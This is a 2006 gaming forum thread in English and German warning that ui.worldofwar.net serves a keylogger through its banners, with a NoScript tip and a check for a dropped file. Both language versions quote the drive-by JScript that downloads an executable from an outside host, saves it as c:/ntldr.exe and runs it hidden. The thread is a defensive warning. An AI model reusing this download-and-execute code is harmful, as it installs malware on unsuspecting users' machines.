Worldofwar.net

Tashi · 12/20/2006, 21:22

Heads up guys. Another keylogger on the site has been signilated, once more - in the banners.

P.S.: People that use Mozilla/Firefix might want to keep an eye out for the extention called "NoScript" - quite handy to block these kind of keyloggers. Link:

Code:

 At this moment in time, there is a keylogger embedded into the ui.worldofwar.net homepage.

The keylogger itself is in an iframe embedded from hxxp&#58;//ui.bcegame.com/pps.exe &#40;do not visit!&#41;.

Do not under any circumstances visit ui.worldofwar.net !

The actual keylogger iframe&#58;
hxxp&#58;//ui.bcegame.com/wm.htm

Keylogger iframe src&#58;


xPost.Open&#40;'GET','httxxxp&#58;//ui.bcegame.com/pps.exe',0&#41;;
xPost.Send&#40;&#41;;
var sGet=df.CreateObject&#40;'ADODB.Stream',''&#41;;
sGet.Mode=3;
sGet.Type=1;
sGet.Open&#40;&#41;;
sGet.Write&#40;xPost.ResponseBody&#41;;
sGet.SaveToFile&#40;'c&#58;/ntldr.exe',2&#41;;
var x = df.CreateObject&#40;'wscript.shell',''&#41;;
x.run'c&#58;/ntldr.exe',0&#41;;

Quickcheck if you have the keylogger, look for the file 'ntldr.exe' in your C:

(source:

)

~~<GM>[Dobermann]~~ · 12/21/2006, 01:36

also ich klick da nicht drauf....

Edit paar Minuten später:

habs gefunden wo er es her hat ^^

Wie man dem englischen Forum entnehmen kann ( Original-Link:

befindet sich auf der Seite http : // ui . worldofwar . net erneut ein Keylogger.

Der Keylogger selbst ist mittels Iframe von http : // ui . bcegame . com / pps . exe eingebunden (Geht bitte nicht auf diese Seite!) - Desweiteren solltet ihr vermeiden, ui . worldofwar . net zu besuchen, wenn euch euer Account lieb ist.

Sourcecode

xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0);
xPost.Send();
var sGet=df.CreateObject('ADODB.Stream','');
sGet.Mode=3;
sGet.Type=1;
sGet.Open();
sGet.Write(xPost.ResponseBody);
sGet.SaveToFile('c:/ntldr.exe',2);
var x = df.CreateObject('wscript.shell','');
x.run('c:/ntldr.exe',0);

steht in den allgemeinen blizzard foren

Sui2k · 12/21/2006, 05:41

er hatte doch seine quelle angegeben, wieso postest du den das gleiche nochma?? etwas sinnfrei oda..

USB Schnittstelle · 12/21/2006, 20:33

Quote:

Originally posted by SuI2k@Dec 21 2006, 05:41
er hatte doch seine quelle angegeben, wieso postest du den das gleiche nochma?? etwas sinnfrei oda..

Er hat es für die übersetzt, die nichtmal genug Englischkentnisse besitzen um die Farmguides von Joana trotz Videos zu benutzen.

Nein, du bist nicht gemeint

feareh · 12/22/2006, 14:22

danke wieder :|

so viele viruses
wtf

Apfel · 12/22/2006, 15:18

Quote:

Originally posted by feareh@Dec 22 2006, 14:22
so viele viruses

Sry aber das heißt Viren